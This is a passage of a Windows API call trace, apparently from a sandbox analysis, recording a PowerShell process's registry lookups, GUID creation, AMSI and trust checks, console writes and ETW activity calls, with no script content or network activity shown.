lpcbData=0x933d188*=0x56) returned 0x0 [0224.490] RegQueryValueExW (in: hKey=0x8dc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933d18c, lpData=0x5772610, lpcbData=0x933d188*=0x56 | out: lpType=0x933d18c*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933d188*=0x56) returned 0x0 [0224.490] RegCloseKey (hKey=0x8dc) returned 0x0 [0224.491] CoTaskMemAlloc (cb=0x10) returned 0x76ca368 [0224.491] CoTaskMemAlloc (cb=0x30) returned 0x767ae28 [0224.491] WinVerifyTrust () returned 0x0 [0224.493] CoTaskMemFree (pv=0x767ae28) [0224.493] CoTaskMemFree (pv=0x76ca368) [0224.493] CertFreeCertificateContext (pCertContext=0x768a190) returned 1 [0224.494] CloseHandle (hObject=0x8a8) returned 1 [0224.494] AmsiScanString () returned 0x80070015 [0224.559] CoCreateGuid (in: pguid=0x933d168 | out: pguid=0x933d168*(Data1=0x55b65b70, Data2=0x6b1a, Data3=0x4285, Data4=([0]=0x8f, [1]=0x2f, [2]=0xaa, [3]=0xa6, [4]=0x49, [5]=0x13, [6]=0x12, [7]=0x50))) returned 0x0 [0224.562] CoCreateGuid (in: pguid=0x933d168 | out: pguid=0x933d168*(Data1=0x96f411cf, Data2=0x2510, Data3=0x4415, Data4=([0]=0x8d, [1]=0x6c, [2]=0xcb, [3]=0x43, [4]=0xec, [5]=0xee, [6]=0x5b, [7]=0x22))) returned 0x0 [0224.562] CoCreateGuid (in: pguid=0x933d168 | out: pguid=0x933d168*(Data1=0xea3b738, Data2=0x743c, Data3=0x4eff, Data4=([0]=0x99, [1]=0xaf, [2]=0xad, [3]=0x86, [4]=0x1a, [5]=0x1d, [6]=0x22, [7]=0xc2))) returned 0x0 [0224.562] CoCreateGuid (in: pguid=0x933d168 | out: pguid=0x933d168*(Data1=0xf626c988, Data2=0x1777, Data3=0x41b3, Data4=([0]=0xbf, [1]=0x34, [2]=0x3c, [3]=0x5b, [4]=0xa3, [5]=0xbb, [6]=0x2b, [7]=0x2c))) returned 0x0 [0224.563] CoCreateGuid (in: pguid=0x933d168 | out: pguid=0x933d168*(Data1=0x13409973, Data2=0x8ceb, Data3=0x454a, Data4=([0]=0x9c, [1]=0x41, [2]=0x8b, [3]=0x52, [4]=0x5e, [5]=0x44, [6]=0x39, [7]=0xba))) returned 0x0 [0224.563] CoCreateGuid (in: pguid=0x933d168 | out: pguid=0x933d168*(Data1=0x275928eb, Data2=0xc4ea, Data3=0x44ce, Data4=([0]=0xba, [1]=0x6b, [2]=0x37, [3]=0x17, [4]=0x36, [5]=0x6f, [6]=0x76, [7]=0xa8))) returned 0x0 [0225.075] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933e560 | out: phkResult=0x933e560*=0x8cc) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x0, lpcbData=0x933e57c*=0x0 | out: lpType=0x933e580*=0x1, lpData=0x0, lpcbData=0x933e57c*=0x56) returned 0x0 [0225.076] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x56c847c, lpcbData=0x933e57c*=0x56 | out: lpType=0x933e580*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933e57c*=0x56) returned 0x0 [0225.076] RegCloseKey (hKey=0x8cc) returned 0x0 [0225.076] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933e560 | out: phkResult=0x933e560*=0x8cc) returned 0x0 [0225.077] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x0, lpcbData=0x933e57c*=0x0 | out: lpType=0x933e580*=0x1, lpData=0x0, lpcbData=0x933e57c*=0x56) returned 0x0 [0225.077] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x56c8790, lpcbData=0x933e57c*=0x56 | out: lpType=0x933e580*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933e57c*=0x56) returned 0x0 [0225.077] RegCloseKey (hKey=0x8cc) returned 0x0 [0225.077] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933e560 | out: phkResult=0x933e560*=0x8cc) returned 0x0 [0225.078] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x0, lpcbData=0x933e57c*=0x0 | out: lpType=0x933e580*=0x1, lpData=0x0, lpcbData=0x933e57c*=0x56) returned 0x0 [0225.078] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x56c8a8c, lpcbData=0x933e57c*=0x56 | out: lpType=0x933e580*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933e57c*=0x56) returned 0x0 [0225.078] RegCloseKey (hKey=0x8cc) returned 0x0 [0225.078] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933e560 | out: phkResult=0x933e560*=0x8cc) returned 0x0 [0225.079] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x0, lpcbData=0x933e57c*=0x0 | out: lpType=0x933e580*=0x1, lpData=0x0, lpcbData=0x933e57c*=0x56) returned 0x0 [0225.079] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x56c8d94, lpcbData=0x933e57c*=0x56 | out: lpType=0x933e580*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933e57c*=0x56) returned 0x0 [0225.079] RegCloseKey (hKey=0x8cc) returned 0x0 [0225.080] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933e560 | out: phkResult=0x933e560*=0x8cc) returned 0x0 [0225.080] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x0, lpcbData=0x933e57c*=0x0 | out: lpType=0x933e580*=0x1, lpData=0x0, lpcbData=0x933e57c*=0x56) returned 0x0 [0225.080] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x56c90a8, lpcbData=0x933e57c*=0x56 | out: lpType=0x933e580*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933e57c*=0x56) returned 0x0 [0225.080] RegCloseKey (hKey=0x8cc) returned 0x0 [0225.081] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933e560 | out: phkResult=0x933e560*=0x8cc) returned 0x0 [0225.081] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x0, lpcbData=0x933e57c*=0x0 | out: lpType=0x933e580*=0x1, lpData=0x0, lpcbData=0x933e57c*=0x56) returned 0x0 [0225.081] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x56c93bc, lpcbData=0x933e57c*=0x56 | out: lpType=0x933e580*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933e57c*=0x56) returned 0x0 [0225.081] RegCloseKey (hKey=0x8cc) returned 0x0 [0225.082] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933e560 | out: phkResult=0x933e560*=0x8cc) returned 0x0 [0225.082] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x0, lpcbData=0x933e57c*=0x0 | out: lpType=0x933e580*=0x1, lpData=0x0, lpcbData=0x933e57c*=0x56) returned 0x0 [0225.082] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e580, lpData=0x56c96b8, lpcbData=0x933e57c*=0x56 | out: lpType=0x933e580*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933e57c*=0x56) returned 0x0 [0225.082] RegCloseKey (hKey=0x8cc) returned 0x0 [0225.083] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x933e5ac | out: phkResult=0x933e5ac*=0x8cc) returned 0x0 [0225.084] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e5cc, lpData=0x0, lpcbData=0x933e5c8*=0x0 | out: lpType=0x933e5cc*=0x1, lpData=0x0, lpcbData=0x933e5c8*=0x56) returned 0x0 [0225.084] RegQueryValueExW (in: hKey=0x8cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x933e5cc, lpData=0x56c9a00, lpcbData=0x933e5c8*=0x56 | out: lpType=0x933e5cc*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x933e5c8*=0x56) returned 0x0 [0225.084] RegCloseKey (hKey=0x8cc) returned 0x0 [0225.095] CoTaskMemAlloc (cb=0x20c) returned 0x7678f60 [0225.095] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x7678f60 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0225.095] CoTaskMemFree (pv=0x7678f60) [0225.095] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0225.095] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0225.363] SetEvent (hEvent=0x8a4) returned 1 [0225.363] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x933e900*=0x8a4, lpdwindex=0x933e71c | out: lpdwindex=0x933e71c) returned 0x0 [0225.892] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x933e894, nSize=0xc3 | out: lpBuffer="ळळ澭ळ玣ळळळңȀ澭ळᆪ玣䷜濥̡") returned 0x0 [0225.895] GetStdHandle (nStdHandle=0xfffffff4) returned 0x1a0 [0225.895] GetFileType (hFile=0x1a0) returned 0x3 [0225.895] GetConsoleMode (in: hConsoleHandle=0x1a0, lpMode=0x933ea34 | out: lpMode=0x933ea34) returned 0 [0225.896] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0x933e9f4 | out: lpConsoleScreenBufferInfo=0x933e9f4) returned 1 [0225.905] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0x933e9f4 | out: lpConsoleScreenBufferInfo=0x933e9f4) returned 1 [0226.056] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x933ed0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933ed0c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0226.056] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933ec78*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933ec78*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc0, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0226.056] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933ecfc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933ecfc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0226.478] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x933ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0226.478] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933e9d4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933e9d4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0226.478] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933ea58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933ea58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0226.631] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x933e934*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933e934*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0226.631] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933e8a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933e8a0*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0226.631] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933e924*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933e924*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0226.650] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x624, lpConsoleScreenBufferInfo=0x933e86c | out: lpConsoleScreenBufferInfo=0x933e86c) returned 1 [0226.657] GetStdHandle (nStdHandle=0xfffffff5) returned 0x19c [0226.657] WriteFile (in: hFile=0x19c, lpBuffer=0x933e810*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x933e814, lpOverlapped=0x0 | out: lpBuffer=0x933e810*, lpNumberOfBytesWritten=0x933e814*=0x0, lpOverlapped=0x0) returned 1 [0226.658] GetFileType (hFile=0x19c) returned 0x3 [0226.661] WriteFile (in: hFile=0x19c, lpBuffer=0x56ec7fc*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x933e7f8, lpOverlapped=0x0 | out: lpBuffer=0x56ec7fc*, lpNumberOfBytesWritten=0x933e7f8*=0x21, lpOverlapped=0x0) returned 1 [0226.661] WriteFile (in: hFile=0x19c, lpBuffer=0x56ec7fc*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x933e7f8, lpOverlapped=0x0 | out: lpBuffer=0x56ec7fc*, lpNumberOfBytesWritten=0x933e7f8*=0x2, lpOverlapped=0x0) returned 1 [0226.661] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933ec9c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933ec9c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0226.661] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933ecfc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933ecfc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.243] WriteFile (in: hFile=0x1a0, lpBuffer=0x54f667c*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x933ece4, lpOverlapped=0x0 | out: lpBuffer=0x54f667c*, lpNumberOfBytesWritten=0x933ece4*=0x23, lpOverlapped=0x0) returned 1 [0227.250] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933f008*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933f008*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc1, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.250] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb5, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb5, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.250] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933ec90*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933ec90*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb5, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.250] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933ecf0*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933ecf0*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.252] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933ee28*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933ee28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc3, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.252] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933ee88*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933ee88*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.253] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933f008*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933f008*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc2, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.253] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb6, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb6, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.254] SetEvent (hEvent=0x828) returned 1 [0227.254] SetEvent (hEvent=0x81c) returned 1 [0227.254] SetEvent (hEvent=0x820) returned 1 [0227.254] SetEvent (hEvent=0x824) returned 1 [0227.267] SetEvent (hEvent=0x838) returned 1 [0227.267] SetEvent (hEvent=0x82c) returned 1 [0227.267] SetEvent (hEvent=0x830) returned 1 [0227.267] SetEvent (hEvent=0x834) returned 1 [0227.269] SetEvent (hEvent=0x840) returned 1 [0227.269] SetEvent (hEvent=0x83c) returned 1 [0227.271] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x933f19c*=0x848, lpdwindex=0x933efbc | out: lpdwindex=0x933efbc) returned 0x0 [0227.295] SetThreadUILanguage (LangId=0x0) returned 0xe90409 [0227.300] CoCreateGuid (in: pguid=0x933f008 | out: pguid=0x933f008*(Data1=0xe5145ac0, Data2=0xd5f6, Data3=0x4508, Data4=([0]=0x94, [1]=0x52, [2]=0x9a, [3]=0xf, [4]=0x9, [5]=0x2d, [6]=0x63, [7]=0x2e))) returned 0x0 [0227.306] QueryPerformanceCounter (in: lpPerformanceCount=0x933efe8 | out: lpPerformanceCount=0x933efe8*=32234097653) returned 1 [0227.306] AmsiOpenSession () returned 0x0 [0227.306] AmsiScanString () returned 0x80070015 [0227.319] QueryPerformanceCounter (in: lpPerformanceCount=0x933efb0 | out: lpPerformanceCount=0x933efb0*=32235397914) returned 1 [0227.319] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x933ed98, nSize=0xc3 | out: lpBuffer="") returned 0x0 [0227.320] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x933f078*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933f078*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc4, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.320] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933efe4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933efe4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb6, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.320] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc4, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc4, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.320] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x933f078*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933f078*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc5, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.320] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933efe4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933efe4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc4, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.320] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc5, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933f068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc5, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0227.395] SetEvent (hEvent=0x80c) returned 1 [0227.395] SetEvent (hEvent=0x7f0) returned 1 [0227.395] SetEvent (hEvent=0x7ec) returned 1 [0227.395] SetEvent (hEvent=0x808) returned 1 [0227.395] SetEvent (hEvent=0x8b8) returned 1 [0227.395] SetEvent (hEvent=0x8cc) returned 1 [0227.395] SetEvent (hEvent=0x8b4) returned 1 [0227.395] SetEvent (hEvent=0x8a8) returned 1 [0227.395] SetEvent (hEvent=0x8dc) returned 1 [0227.395] SetEvent (hEvent=0x8bc) returned 1 [0227.395] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x933f19c*=0x848, lpdwindex=0x933efbc | out: lpdwindex=0x933efbc) returned 0x0 [0230.495] CoGetContextToken (in: pToken=0x933f590 | out: pToken=0x933f590) returned 0x0 [0230.612] CoUninitialize () Thread: id = 45 os_tid = 0x12f8 Thread: id = 48 os_tid = 0x12c0 [0218.618] CoGetContextToken (in: pToken=0x937fc34 | out: pToken=0x937fc34) returned 0x0 [0218.633] IUnknown:QueryInterface (in: 